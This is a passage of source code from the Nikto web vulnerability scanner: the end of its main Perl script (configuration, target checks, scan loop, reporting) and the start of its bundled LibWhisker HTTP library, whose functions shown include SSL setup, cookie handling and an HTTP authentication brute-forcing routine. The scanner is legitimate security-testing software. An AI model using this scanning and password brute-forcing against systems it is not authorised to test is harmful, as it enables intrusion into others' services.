\\&safe_quit;\n\nconfig_init();\nsetup_dirs();\nrequire \"$CONFIGFILE{'PLUGINDIR'}/nikto_core.plugin\";\nnprint(\"T:\" . localtime($COUNTERS{'scan_start'}) . \": Starting\", \"d\");\nrequire \"$CONFIGFILE{'PLUGINDIR'}/LW2.pm\";\n$VARIABLES{'GMTOFFSET'} = gmt_offset();\n\n# use LW2;                   ### Change this line to use a different installed version\n\n#set SSL Engine\nLW2::init_ssl_engine($CONFIGFILE{'LW_SSL_ENGINE'});\n\nmy ($a, $b) = split(/\\./, $LW2::VERSION);\ndie(\"- You must use LW2 2.4 or later\\n\") if ($a != 2 || $b < 4);\n\ngeneral_config();\nload_databases();\nload_databases('u');\nnprint(\"- $VARIABLES{'name'} v$VARIABLES{'version'}\");\nnprint($VARIABLES{'DIV'});\n\n# No targets - quit while we're ahead\nif ($CLI{'host'} eq '') {\n    nprint(\"+ ERROR: No host (-host) specified\");\n    usage(1);\n}\n\n$COUNTERS{'total_targets'} = $COUNTERS{'hosts_completed'} = 0;\nload_plugins();\n\nmy $is_failure = 0;\n\n# Parse the supplied list of targets\nmy @MARKS = set_targets($CLI{'host'}, $CLI{'ports'}, $CLI{'ssl'}, $CLI{'root'});\n\nif (defined($CLI{'key'}) || defined($CLI{'cert'})) {\n    $CLI{'key'}  = $CLI{'cert'} unless (defined($CLI{'key'}));\n    $CLI{'cert'} = $CLI{'key'}  unless (defined($CLI{'cert'}));\n}\n\n# Open reporting\nreport_head($CLI{'format'}, $CLI{'file'});\n\n# Now check each target is real and remove duplicates/fill in extra information\nforeach my $mark (@MARKS) {\n    $mark->{'messages'} =  ();\n    $mark->{'test'} = 1;\n    $mark->{'failures'} = 0;\n\n    # Try to resolve the host\n    my $msgs;\n    ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'display_name'}, $msgs) = resolve($mark->{'ident'});\n    if ($msgs ne \"\") {\n\tpush(@{ $mark->{'messages'} }, $msgs);\n\t#push ($mark->{'messages'}, $msgs);\n    }\n\n    # Skip if we can't resolve the host - we'll error later\n    if (!defined $mark->{'ip'}) {\n        $mark->{'test'} = 0;\n        next;\n    }\n\n    # Read cookies from conf & set into the cookie jar\n    if (defined $CONFIGFILE{'STATIC-COOKIE'}) {\n        $mark->{'cookiejar'} = LW2::cookie_new_jar();\n        foreach my $p (split(/;/, $CONFIGFILE{'STATIC-COOKIE'})) {\n            if ($p =~ /\"([^=]+)=(.+)\"/) {\n                LW2::cookie_set(\\%{ $mark->{'cookiejar'} }, $1, $2);\n                }\n       }\n    }\n\n    if (defined $CLI{'vhost'}) { $mark->{'vhost'} = $CLI{'vhost'} }\n\n    # Check that the port is open\n    my $open =\n      port_check(time(), $mark->{'hostname'}, $mark->{'ip'}, $mark->{'port'}, $CLI{'key'}, $CLI{'cert'}, $mark->{'vhost'});\n    if ($open == 0) {\n        $mark->{'test'} = 0;\n        next;\n    }\n    else {\n        $COUNTERS{'total_targets'}++;\n    }\n    $mark->{'ssl'} = $open - 1;\n\n    if ($mark->{'ssl'}) {\n        $mark->{'key'}  = $CLI{'key'};\n        $mark->{'cert'} = $CLI{'cert'};\n    }\n}\n\n# Load db_tests\nset_scan_items();\n\n# Start hook to allow plugins to load databases etc\nrun_hooks(\"\", \"start\");\n\n# Now we've done the precursor, do the scan\nforeach my $mark (@MARKS) {\n    next unless ($mark->{'test'});\n    $mark->{'start_time'} = time();\n    $VARIABLES{'TEMPL_HCTR'}++;\n\n    if (defined $CLI{'vhost'}) {\n        $mark->{'vhost'} = $CLI{'vhost'};\n    }\n\n    # Saving responses\n    if ($CLI{'saveresults'} ne '') {\n        $mark->{'save_dir'} = save_createdir($CLI{'saveresults'}, $mark);\n        $mark->{'save_prefix'} = save_getprefix($mark);\n    }\n\n    $mark->{'total_vulns'}  = 0;\n    $mark->{'total_errors'} = 0;\n\n    my %FoF = ();\n\n    nfetch($mark, \"/\", \"GET\", \"\", \"\", { noprefetch => 1, nopostfetch => 1 }, \"getinfo\");\n\n    report_host_start($mark);\n    if ($CLI{'findonly'}) {\n        my $protocol = \"http\";\n        if ($mark->{'ssl'}) { $protocol .= \"s\"; }\n        if ($mark->{'banner'} eq \"\") {\n            $mark->{'banner'} = \"(no identification possible)\";\n        }\n\n        add_vulnerability($mark,\n                   \"Server: $protocol://$mark->{'display_name'}:$mark->{'port'}\\t$mark->{'banner'}\",\n                   0);\n    }\n    else {\n        dump_target_info($mark);\n        unless ((defined $CLI{'nofof'}) || ($CLI{'plugins'} eq '@@NONE')) { map_codes($mark) }\n        run_hooks($mark, \"recon\");\n        run_hooks($mark, \"scan\");\n    }\n\n    if ($mark->{'total_errors'} > 0 || $mark->{'total_vulns'} > 0) {\n        $is_failure = 1;\n    }\n\n    $mark->{'end_time'} = time();\n    $mark->{'elapsed'}  = $mark->{'end_time'} - $mark->{'start_time'};\n    if (!$CLI{'findonly'}) {\n        if (!$mark->{'terminate'}) {\n            nprint(\n                \"+ $COUNTERS{'totalrequests'} requests: $mark->{'total_errors'} error(s) and $mark->{'total_vulns'} item(s) reported on remote host\"\n                );\n        }\n        else {\n            nprint(\n                \"+ SCAN TERMINATED:  $mark->{'total_errors'} error(s) and $mark->{'total_vulns'} item(s) reported on remote host\"\n                );\n                $is_failure = 1;\n        }\n        nprint(  \"+ End Time:           \"\n               . date_disp($mark->{'end_time'})\n               . \" (GMT$VARIABLES{'GMTOFFSET'}) ($mark->{'elapsed'} seconds)\");\n    }\n    nprint($VARIABLES{'DIV'});\n\n    $COUNTERS{'hosts_completed'}++;\n    report_host_end($mark);\n}\n$COUNTERS{'scan_end'}     = time();\n$COUNTERS{'scan_elapsed'} = ($COUNTERS{'scan_end'} - $COUNTERS{'scan_start'});\nreport_summary();\nreport_close();\n\nif (!$CLI{'findonly'}) {\n    nprint(\"+ $COUNTERS{'hosts_completed'} host(s) tested\");\n    nprint(\"+ $COUNTERS{'totalrequests'} requests made in $COUNTERS{'scan_elapsed'} seconds\", \"v\");\n\n    send_updates(@MARKS);\n}\n\nnprint(\"T:\" . localtime() . \": Ending\", \"d\");\n\nexit $is_failure;\n\n#################################################################################\n# Load config files in order\nsub config_init {\n    my (@CF, $home);\n    my $config_exists = 0;\n\n    # read just the --config option\n    {\n        my %optcfg;\n        Getopt::Long::Configure('pass_through', 'noauto_abbrev');\n        GetOptions(\\%optcfg, \"config=s\");\n        Getopt::Long::Configure('nopass_through', 'auto_abbrev');\n        if (defined $optcfg{'config'}) { $VARIABLES{'configfile'} = $optcfg{'config'}; }\n    }\n\n    # Guess Nikto current directory\n    my $NIKTODIR = abs_path($0);\n    chomp($NIKTODIR);\n    $NIKTODIR =~ s#[\\\\/]nikto.pl$##;\n\n    # Guess user's home directory -- to support Windows\n    foreach my $var (split(/ /, \"HOME USERPROFILE\")) {\n        $home = $ENV{$var} if ($ENV{$var});\n    }\n\n    # Read the conf files in order (previous values are over-written with each, if multiple found)\n    push(@CF,\"$NIKTODIR/nikto.conf.default\");\n    push(@CF,\"/etc/nikto.conf\");\n    push(@CF,\"$home/nikto.conf\");\n    push(@CF,\"$NIKTODIR/nikto.conf\");\n    push(@CF,\"nikto.conf\");\n    push(@CF,\"$VARIABLES{'configfile'}\");\n\n    # load in order, over-writing values as we go\n    for (my $i=0;$i<=$#CF;$i++) {\n        my $error = load_config($CF[$i]);\n        $config_exists = 1 if ($error eq \"\"); # any loaded is good\n    }\n\n    # Couldn't find any\n    if ($config_exists == 0) {\n        die \"- Could not find a valid nikto config file. Tried: @CF\\n\";\n    }\n\n    return;\n}\n\n###############################################################################\nsub load_modules {\n        my $errors=0;\n\tmy @modules = qw/Getopt::Long Time::Local IO::Socket Net::hostent/;\n\tpush(@modules,\"List::Util qw(sum)\");\n\tpush(@modules,\"Cwd 'abs_path'\");\n\tforeach my $mod (@modules) {\n\t\teval \"use $mod\";\n        \tif ($@) {\n\t\t\tprint \"ERROR: Required module not found: $mod\\n\";\n\t\t\t$errors=1;\n\t\t}\n\t}\n\n\t@modules = ();\n\tpush(@modules,\"Time::HiRes qw(sleep ualarm gettimeofday tv_interval)\");\n\tpush(@modules,\"POSIX qw(:termios_h)\");\n\tforeach my $mod (@modules) {\n\t\teval \"use $mod\";\n\t\tif ($@ && $^O !~ /MSWin32/) {\n\t\t\t# Allow this to work on Windows\n\t\t\tif ($@) { print \"ERROR: Required module not found: $mod\\n\"; $errors=1; }\n\t\t}\n\t}\n\n\tif ($errors) { exit 1; }\n}\n\n#################################################################################\n# load config file\n# error=load_config(FILENAME)\nsub load_config {\n    my $configfile = $_[0];\n\n    open(CONF, \"<$configfile\") || return \"+ ERROR: Unable to open config file '$configfile'\";\n    my @CONFILE = <CONF>;\n    close(CONF);\n\n    foreach my $line (@CONFILE) {\n        $line =~ s/\\#.*$//;\n        chomp($line);\n        $line =~ s/\\s+$//;\n        $line =~ s/^\\s+//;\n        next if ($line eq \"\");\n        my @temp = split(/=/, $line, 2);\n        if ($temp[0] ne \"\") { $CONFIGFILE{ $temp[0] } = $temp[1]; }\n    }\n\n    # add CONFIG{'CLIOPTS'} to ARGV if defined...\n    if (defined $CONFIGFILE{'CLIOPTS'}) {\n        my @t = split(/ /, $CONFIGFILE{'CLIOPTS'});\n        foreach my $c (@t) { push(@ARGV, $c); }\n    }\n\n    # Check for necessary config items\n    check_config_defined(\"CHECKMETHODS\", \"HEAD\");\n    check_config_defined('@@DEFAULT',    '@@ALL');\n\n    return \"\";\n}\n#################################################################################\n# find plugins directory\nsub setup_dirs {\n    my $CURRENTDIR = abs_path($0);\n    chomp($CURRENTDIR);\n    $CURRENTDIR =~ s#[\\\\/]nikto.pl$##;\n    $CURRENTDIR = \".\" if $CURRENTDIR =~ /^nikto.pl$/;\n\n    # First assume we get it from CONFIGFILE\n    unless (defined $CONFIGFILE{'EXECDIR'}) {\n        if (-d \"$ENV{'PWD'}/plugins\") {\n            $CONFIGFILE{'EXECDIR'} = $ENV{'PWD'};\n        }\n        elsif (-d \"$CURRENTDIR/plugins\") {\n            $CONFIGFILE{'EXECDIR'} = $CURRENTDIR;\n        }\n        elsif (-d \"./plugins\") {\n            $CONFIGFILE{'EXECDIR'} = $CURRENTDIR;\n        }\n        else {\n            print STDERR \"Could not work out the nikto EXECDIR, try setting it in nikto.conf\\n\";\n            exit;\n        }\n    }\n    unless (defined $CONFIGFILE{'PLUGINDIR'}) {\n        $CONFIGFILE{'PLUGINDIR'} = \"$CONFIGFILE{'EXECDIR'}/plugins\";\n    }\n    unless (defined $CONFIGFILE{'TEMPLATEDIR'}) {\n        $CONFIGFILE{'TEMPLATEDIR'} = \"$CONFIGFILE{'EXECDIR'}/templates\";\n    }\n    unless (defined $CONFIGFILE{'DOCDIR'}) {\n        $CONFIGFILE{'DOCDIR'} = \"$CONFIGFILE{'EXECDIR'}/docs\";\n    }\n    unless (defined $CONFIGFILE{'DBDIR'}) {\n        $CONFIGFILE{'DBDIR'} = \"$CONFIGFILE{'EXECDIR'}/databases\";\n    }\n    return;\n}\n\n######################################################################\n## check_config_defined(item, default)\n## Checks whether config has been set, warns and sets to a default\nsub check_config_defined {\n    my $item    = $_[0];\n    my $default = $_[1];\n\n    if (!defined $CONFIGFILE{$item}) {\n        print STDERR\n          \"- Warning: $item is not defined in Nikto configuration, setting to \\\"$default\\\"\\n\";\n        $CONFIGFILE{$item} = $default;\n    }\n\n    return;\n}\n"
  },
  {
    "path": "nikto/program/plugins/LW2.pm",
    "content": "#!perl\n# LW2 version 2.5.1\n#   LW2 Copyright (c) 2009, Jeff Forristal (wiretrip.net)\n#   All rights reserved.\n#\n#   Redistribution and use in source and binary forms, with or without \n#   modification, are permitted provided that the following conditions \n#   are met:\n#\n#   - Redistributions of source code must retain the above copyright \n#   notice, this list of conditions and the following disclaimer.\n#\n#   - Redistributions in binary form must reproduce the above copyright \n#   notice, this list of conditions and the following disclaimer in the \n#   documentation and/or other materials provided with the distribution.\n#\n#   THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \n#   \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT \n#   LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \n#   FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE \n#   COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, \n#   INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, \n#   BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; \n#   LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \n#   CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT \n#   LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN \n#   ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE \n#   POSSIBILITY OF SUCH DAMAGE.\n#\n#   Note that this file has been updated as part of the Nikto project,\n#   and is technically a fork of LibWhisker 2.5.\n\n=head1 NAME\n\nLW2 - Perl HTTP library version 2.5\n\n=head1 SYNOPSIS\n\nuse LW2;\n\nrequire 'LW2.pm';\n\n=head1 DESCRIPTION\n\nLibwhisker is a Perl library useful for HTTP testing scripts.  It\ncontains a pure-Perl reimplementation of functionality found in the C<LWP>,\nC<URI>, C<Digest::MD5>, C<Digest::MD4>, C<Data::Dumper>, C<Authen::NTLM>,\nC<HTML::Parser>, C<HTML::FormParser>, C<CGI::Upload>, C<MIME::Base64>,\nand C<GetOpt::Std> modules.\n\nLibwhisker is designed to be portable (a single perl file), fast (general\nbenchmarks show libwhisker is faster than LWP), and flexible (great care\nwas taken to ensure the library does exactly what you want to do, even\nif it means breaking the protocol).\n\n=head1 FUNCTIONS\n\nThe following are the functions contained in Libwhisker:\n\n=over 4\n\n=cut\n\n\npackage LW2;\n$LW2::VERSION=\"2.5\";\n$PACKAGE='LW2';\n\n# BEGIN is at the end of the file. Here come the functions.\n\n########################################################################\n#\n=item B<init_ssl_engine>\n\nParams: $lw_ssl_engine\n\nReturn: always returns undef\n\nThis function chooses the right SSL Engine and initializes SSL if needed.\nThis has been done because SSLeay seems to have memory leaks and there\nwas no other way to quickly change SSL Engine.\nlw_ssl_engine can have these values:\n\tauto \t= autodetection where it uses SSL first\n\t\t  (this is the default upon loading the module)\n\tSSL  \t= Net::SSL\n\tSSLeay \t= Net::SSLeay\n\nPrecondition for the function is that if you choose a specific library\nthis library must be installed.\n\n=cut\n\nsub init_ssl_engine {\n    my  ($lw_ssl_engine) = @_;\n\n    # if user-specified, undef initialization in case user's desired lib is not available\n    if ($lw_ssl_engine ne 'auto') {\n        $LW_SSL_LIB   = 0;\n        $_SSL_LIBRARY = undef;\n\t}\n\n    if ($lw_ssl_engine eq 'SSLeay'){\n\t# use Net::SSLeay as your SSL Library\n        eval \"use Net::SSLeay\";\n\tif ( !$@ ) {\n        \t$LW_SSL_LIB   = 1;\n        \t$_SSL_LIBRARY = 'Net::SSLeay';\n        \tNet::SSLeay::load_error_strings();\n        \tNet::SSLeay::SSLeay_add_ssl_algorithms();\n        \tNet::SSLeay::randomize();\n\t\t}\n\telse  { print \"ERROR: $@\\n\"; exit; }\n    } elsif ($lw_ssl_engine eq 'SSL'){\n        # use Net:SSL\n        eval \"use Net::SSL\";\n\tif ( !$@ ) {\n        \t$LW_SSL_LIB   = 2;\n        \t$_SSL_LIBRARY = 'Net::SSL';\n\t\t}\n\telse  { print \"ERROR: $@\\n\"; exit; }\n    }\n\telse {\n\t# assuming autodetection\n\teval \"use Net::SSL\";\n        if ( !$@ ) {\n                $LW_SSL_LIB   = 2;\n                $_SSL_LIBRARY = 'Net::SSL';\n\t\t}\n\telse {\n        eval \"use Net::SSLeay\";\n        if ( !$@ ) {\n                $LW_SSL_LIB   = 1;\n                $_SSL_LIBRARY = 'Net::SSLeay';\n                Net::SSLeay::load_error_strings();\n                Net::SSLeay::SSLeay_add_ssl_algorithms();\n                Net::SSLeay::randomize();\n                }\n\t\t}\n        }\n\nreturn undef;\n\n} #sub\n\n########################################################################\n# Module Initialization starts here\nBEGIN {\npackage LW2;\n$PACKAGE='LW2';\n    ## LW module manager stuff ##\n\n    $LW_SSL_LIB          = 0;\n    $LW_SSL_KEEPALIVE    = 0;\n    $LW_NONBLOCK_CONNECT = 1;\n\n    $_SSL_LIBRARY = undef;\n\n    # check for Socket\n     eval \"use Socket\";\n     if ( $@ ) {\n\tdie('You have to install the module Socket');\n     }\n\n    # init SSL with autoconfig first. App can later override this\n    init_ssl_engine('auto');\n\n    if ( $^O !~ /Win32/ ) {\n        eval \"use POSIX qw(:errno_h :fcntl_h)\";\n        if ($@) { $LW_NONBLOCK_CONNECT = 0; }\n    }\n    else {\n\n        # taken from Winsock2.h\n        *EINPROGRESS = sub { 10036 };\n        *EWOULDBLOCK = sub { 10035 };\n    }\n\n} # BEGIN\n\n\n########################################################################\n\n=item B<auth_brute_force>\n\nParams: $auth_method, \\%req, $user, \\@passwords [, $domain, $fail_code ]\nReturn: $first_valid_password, undef if error/none found\n\nPerform a HTTP authentication brute force against a server (host and URI\ndefined in %req).  It will try every password in the password array for\nthe given user.  The first password (in conjunction with the given user)\nthat doesn't return HTTP 401 is returned (and the brute force is stopped\nat that point).  You should retry the request with the given password and\ndouble-check that you got a useful HTTP return code that indicates\nsuccessful authentication (200, 302), and not something a bit more\nabnormal (407, 500, etc).  $domain is optional, and is only used for NTLM\nauth.\n\nNote: set up any proxy settings and proxy auth in %req before calling\nthis function.\n\nYou can brute-force proxy authentication by setting up the target proxy\nas proxy_host and proxy_port in %req, using an arbitrary host and uri\n(preferably one that is reachable upon successful proxy authorization),\nand setting the $fail_code to 407.  The $auth_method passed to this\nfunction should be a proxy-based one ('proxy-basic', 'proxy-ntlm', etc).\n\nif your server returns something other than 401 upon auth failure, then\nset $fail_code to whatever is returned (and it needs to be something\n*different* than what is received on auth success, or this function\nwon't be able to tell the difference).\n\n=cut\n\nsub auth_brute_force {\n    my ( $auth_method, $hrin, $user, $pwordref, $dom, $fail_code ) = @_;\n    my ( $P, %hout );\n    $fail_code ||= 401;\n\n    return undef if ( !defined $auth_method || length($auth_method) == 0 );\n    return undef if ( !defined $user        || length($user) == 0 );\n    return undef if ( !( defined $hrin     && ref($hrin) ) );\n    return undef if ( !( defined $pwordref && ref($pwordref) ) );\n\n    map {\n        ( $P = $_ ) =~ tr/\\r\\n//d;\n        auth_set( $auth_method, $hrin, $user, $P, $dom );\n        return undef if ( http_do_request( $hrin, \\%hout ) );\n        return $P if ( $hout{whisker}->{code} != $fail_code );\n    } @$pwordref;\n\n    return undef;\n}\n\n########################################################################\n\n=item B<auth_unset>\n\nParams: \\%req\n\nReturn: nothing (modifies %req)\n\nModifies %req to disable all authentication (regular and proxy).\n\nNote: it only removes the values set by auth_set().  Manually-defined\n[Proxy-]Authorization headers will also be deleted (but you shouldn't\nbe using the auth_* functions if you're manually handling your own auth...)\n\n=cut\n\nsub auth_unset {\n    my $href = shift;\n    return if ( !defined $href || !ref($href) );\n    delete $$href{Authorization};\n    delete $$href{'Proxy-Authorization'};\n    delete $$href{whisker}->{auth_callback};\n    delete $$href{whisker}->{auth_proxy_callback};\n    delete $$href{whisker}->{auth_data};\n    delete $$href{whisker}->{auth_proxy_data};\n}\n\n########################################################################\n\n=item B<auth_set>\n\nParams: $auth_method, \\%req, $user, $password [, $domain]\n\nReturn: nothing (modifies %req)\n\nModifies %req to use the indicated authentication info.\n\nAuth_method can be: 'basic', 'proxy-basic', 'ntlm', 'proxy-ntlm'.\n\nNote: this function may not necessarily set any headers after being called.\nAlso, proxy-ntlm with SSL is not currently supported.\n\n=cut\n\nsub auth_set {\n    my ( $method, $href, $user, $pass, $domain ) = ( lc(shift), @_ );\n\n    return if ( !( defined $href && ref($href) ) );\n    return if ( !defined $user || !defined $pass );\n\n    if ( $method eq 'basic' ) {\n        $$href{'Authorization'} =\n          'Basic ' . encode_base64( $user . ':' . $pass, '' );\n    }\n\n    if ( $method eq 'proxy-basic' ) {\n        $$href{'Proxy-Authorization'} =\n          'Basic ' . encode_base64( $user . ':' . $pass, '' );\n    }\n\n    if ( $method eq 'ntlm' ) {\n        http_close($href);\n        $$href{whisker}->{auth_data} = ntlm_new( $user, $pass, $domain );\n        $$href{whisker}->{auth_callback} = \\&_ntlm_auth_callback;\n    }\n\n    if ( $method eq 'proxy-ntlm' ) {\n        utils_croak('',\"auth_set: proxy-ntlm auth w/ SSL not currently supported\")\n          if ( $href->{whisker}->{ssl} > 0 );\n        http_close($href);\n        $$href{whisker}->{auth_proxy_data} = ntlm_new( $user, $pass, $domain );\n        $$href{whisker}->{auth_proxy_callback} = \\&_ntlm_auth_proxy_callback;\n    }\n\n}\n\n\n########################################################################\n\n=item B<cookie_new_jar>\n\nParams: none\n\nReturn: $jar\n\nCreate a new cookie jar, for use with the other functions.  Even though\nthe jar is technically just a hash, you should still use this function\nin order to be future-compatible (should the jar format change).\n\n=cut\n\nsub cookie_new_jar {\n    return {};\n}\n\n########################################################################\n\n=item B<cookie_read>\n\nParams: $jar, \\%response [, \\%request, $reject ]\n\nReturn: $num_of_cookies_read\n\nRead in cookies from an %response hash, and put them in $jar.\n\nNotice: cookie_read uses internal magic done by http_do_request\nin order to read cookies regardless of 'Set-Cookie[2]' header\nappearance.\n\nIf the optional %request hash is supplied, then it will be used to\ncalculate default host and path values, in case the cookie doesn't\nspecify them explicitly.  If $reject is set to 1, then the %request\nhash values are used to calculate and reject cookies which are not\nappropriate for the path and domains of the given request.\n\n=cut\n\nsub cookie_read {\n    my ( $count, $jarref, $hrs, $hrq, $rej ) = ( 0, @_ );\n\n    return 0 if ( !( defined $jarref && ref($jarref) ) );\n    return 0 if ( !( defined $hrs   && ref($hrs) ) );\n    return 0\n      if (\n        !(\n            defined $$hrs{whisker}->{cookies}\n            && ref( $$hrs{whisker}->{cookies} )\n        )\n      );\n\n\t\tmy @opt;\n\t\tif(defined $hrq && ref($hrq)){\n\t\t\tpush @opt, $hrq->{whisker}->{host};\n\t\t\tmy $u = $hrq->{whisker}->{uri};\n\t\t\t$u=~s#/.*?$##;\n\t\t\t$u='/' if($u eq '');\n\t\t\tpush @opt, $u, $rej;\n\t\t}\n\n    foreach ( @{ $hrs->{whisker}->{cookies} } ) {\n        cookie_parse( $jarref, $_ , @opt);\n        $count++;\n    }\n    return $count;\n}\n\n########################################################################\n\n=item B<cookie_parse>\n\nParams: $jar, $cookie [, $default_domain, $default_path, $reject ]\n\nReturn: nothing\n\nParses the cookie into the various parts and then sets the appropriate\nvalues in the cookie $jar. If the cookie value is blank, it will delete\nit from the $jar.  See the 'docs/cookies.txt' document for a full\nexplanation of how Libwhisker parses cookies and what RFC aspects are\nsupported.\n\nThe optional $default_domain value is taken literally.  Values with no\nleading dot (e.g. 'www.host.com') are considered to be strict hostnames\nand will only match the identical hostname.  Values with leading dots (e.g.\n'.host.com') are treated as sub-domain matches for a single domain level.\nIf the cookie does not indicate a domain, and a $default_domain is not\nprovided, then the cookie is considered to match all domains/hosts.\n\nThe optional $default_path is used when the cookie does not specify a path.\n$default_path must be absolute (start with '/'), or it will be ignored.  If\nthe cookie does not specify a path, and $default_path is not provided, then\nthe default value '/' will be used.\n\nSet $reject to 1 if you wish to reject cookies based upon the provided\n$default_domain and $default_path.  Note that $default_domain and\n$default_path must be specified for $reject to actually do something\nmeaningful.\n\n=cut\n\nsub cookie_parse {\n    my ( $jarref, $header ) = (shift, shift);\n\t\tmy ( $Dd, $Dp, $R ) = (shift, shift, shift||0);\n\n    return if ( !( defined $jarref && ref($jarref) ) );\n    return if ( !( defined $header && length($header) > 0 ) );\n\n\t\tmy @C = ( undef, undef, undef, undef, 0 );\n\n\t\t$header =~ tr/\\r\\n//d;\n\t\tmy ($f,%seen,$n,$t) = (1);\n    while( length($header) ){\n    \t$header =~ s/^[ \\t]+//;\n    \tlast if(!($header =~ s/^([^ \\t=;]+)//));\n\t\t\t# LW2.5 change: cookie name is no longer lower-cased\n    \t# my $an = lc($1);\n    \tmy $an = $1;\n\t\t\tmy $av = undef;\n    \t$header =~ s/^[ \\t]+//;\n    \tif(substr($header,0,1) eq '='){\n    \t\t$header=~s/^=[ \\t]*//;\n    \t\tif(substr($header,0,1) eq '\"'){\n    \t\t\tmy $p = index($header,'\"',1);\n    \t\t\tlast if($p == -1);\n    \t\t\t$av = substr($header,1,$p-1);\n    \t\t\tsubstr($header,0,$p+1)='';\n    \t\t} else {\n\t\t\t\t\t$av = $1 if($header =~ s/^([^ \\t;,]*)//);\n    \t\t}\n    \t} else {\n    \t\tmy $p = index($header,';');\n    \t\tsubstr($header,0,$p)='';\n    \t}\n    \t$header =~ s/^.*?;//;\n\t\t\tif($f){\n\t\t\t\treturn if(!defined $av);\n\t\t\t\t($f,$n,$C[0])=(0,$an,$av);\n\t\t\t} else {\n\t\t\t\t$seen{$an}=$av if(!exists $seen{$an});\n  \t\t}\n    }\n\n\t\treturn if(!defined $n || $n eq '');\n\t\tmy $del = 0;\n\t\t$del++ if($C[0] eq '');\n\t\t$del++ if(defined $seen{'max-age'} && $seen{'max-age'} eq '0');\n\t\tif($del){\n        delete $$jarref{$n} if exists $$jarref{$n};\n        return;\n\t\t}\n\n\t\tif(defined $seen{domain} && $seen{domain} ne ''){\n\t\t\t$t = $seen{domain};\n\t\t\t$t='.'.$t if(substr($t,0,1) ne '.' && !_is_ip_address($t));\n\t\t} else {\n\t\t\t$t=$Dd;\n\t\t}\n\t\t$t=~s/\\.+$// if(defined $t);\n\t\t$C[1]=$t;\n\n\t\tif(defined $seen{path}){\n\t\t\t$t = $seen{path};\n\t\t} else {\n\t\t\t$t=$Dp || '/';\n\t\t}\n\t\t$t=~s#/+$##;\n\t\t$t='/' if(substr($t,0,1) ne '/');\n\t\t$C[2]=$t;\n\n\t\t$C[4]=1 if(exists $seen{secure});\n\n\t\treturn if($R && !_is_valid_cookie_match($C[1], $C[2], $Dd, $Dp));\n    $$jarref{$n} = \\@C;\n}\n\n########################################################################\n\nsub _is_ip_address {\n\tmy $n = shift;\n\treturn 1 if($n=~/^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$/);\n\treturn 0;\n}\n\nsub _is_valid_cookie_match {\n\tmy ($cd, $cp, $td, $tp) = @_;\n\treturn 0 if(index($tp,$cp)!=0);\n\tif(substr($cd,0,1) eq '.'){\n\t\tif( $td =~ /(.+)$cd$/ ){\n\t\t\treturn 1 if(index($1,'.') == -1);\n\t\t}\n\t\treturn 0;\n\t} else {\n\t\treturn 0 if($cd ne $td);\n\t}\n\treturn 1;\n}\n\n########################################################################\n\n=item B<cookie_write>\n\nParams: $jar, \\%request, $override\n\nReturn: nothing\n\nGoes through the given $jar and sets the Cookie header in %req pending the\ncorrect domain and path.  If $override is true, then the secure, domain and\npath restrictions of the cookies are ignored and all cookies are essentially\nincluded.\n\nNotice: cookie expiration is currently not implemented.  URL restriction\ncomparison is also case-insensitive.\n\n=cut\n\nsub cookie_write {\n    my ( $jarref, $hin, $override ) = @_;\n    my ( $name, $out ) = ( '', '' );\n\n    return if ( !( defined $jarref && ref($jarref) ) );\n    return if ( !( defined $hin    && ref($hin) ) );\n\n    $override = $override || 0;\n    $$hin{'whisker'}->{'ssl'} = $$hin{'whisker'}->{'ssl'} || 0;\n\n    foreach $name ( keys %$jarref ) {\n        next if ( $name eq '' );\n        if($override){\n            $out .= \"$name=$$jarref{$name}->[0];\";\n            next;\n        }\n        next if ( $$hin{'whisker'}->{'ssl'} == 0 && $$jarref{$name}->[4] > 0 );\n        if ( $$hin{'whisker'}->{'host'} =~ /$$jarref{$name}->[1]$/i\n                && $$hin{'whisker'}->{'uri'} =~ /^$$jarref{$name}->[2])/ )\n        {\n            $out .= \"$name=$$jarref{$name}->[0];\";\n        }\n    }\n\n    if ( $out ne '' ) { $$hin{'Cookie'} = $out; }\n\n}\n\n########################################################################\n\n=item B<cookie_get>\n\nParams: $jar, $name\n\nReturn: @elements\n\nFetch the named cookie from the $jar, and return the components.  The\nreturned items will be an array in the following order:\n\nvalue, domain, path, expire, secure\n\nvalue  = cookie value, should always be non-empty string\ndomain = domain root for cookie, can be undefined\npath   = URL path for cookie, should always be a non-empty string\nexpire = undefined (depreciated, but exists for backwards-compatibility)\nsecure = whether or not the cookie is limited to HTTPs; value is 0 or 1\n\n=cut\n\nsub cookie_get {\n    my ( $jarref, $name ) = @_;\n\n    return undef if ( !( defined $jarref && ref($jarref) ) );\n\n    if ( defined $$jarref{$name} ) {\n        return @{ $$jarref{$name} };\n    }\n\n    return undef;\n}\n\n########################################################################\n\n=item B<cookie_get_names>\n\nParams: $jar\n\nReturn: @names\n\nFetch all the cookie names from the jar, which then let you cooke_get()\nthem individually.\n\n=cut\n\nsub cookie_get_names {\n    my ( $jarref, $name ) = @_;\n\n    return undef if ( !( defined $jarref && ref($jarref) ) );\n    return keys %$jarref;\n}\n\n########################################################################\n\n=item B<cookie_get_valid_names>\n\nParams: $jar, $domain, $url, $ssl\n\nReturn: @names\n\nFetch all the cookie names from the jar which are valid for the given\n$domain, $url, and $ssl values.  $domain should be string scalar of the\ntarget host domain ('www.example.com', etc.).  $url should be the absolute\nURL for the page ('/index.html', '/cgi-bin/foo.cgi', etc.).  $ssl should be\n0 for non-secure cookies, or 1 for all (secure and normal) cookies.  The\nreturn value is an array of names compatible with cookie_get().\n\n=cut\n\nsub cookie_get_valid_names {\n    my ( $jarref, $domain, $url, $ssl ) = @_;\n\n    return () if ( !( defined $jarref && ref($jarref) ) 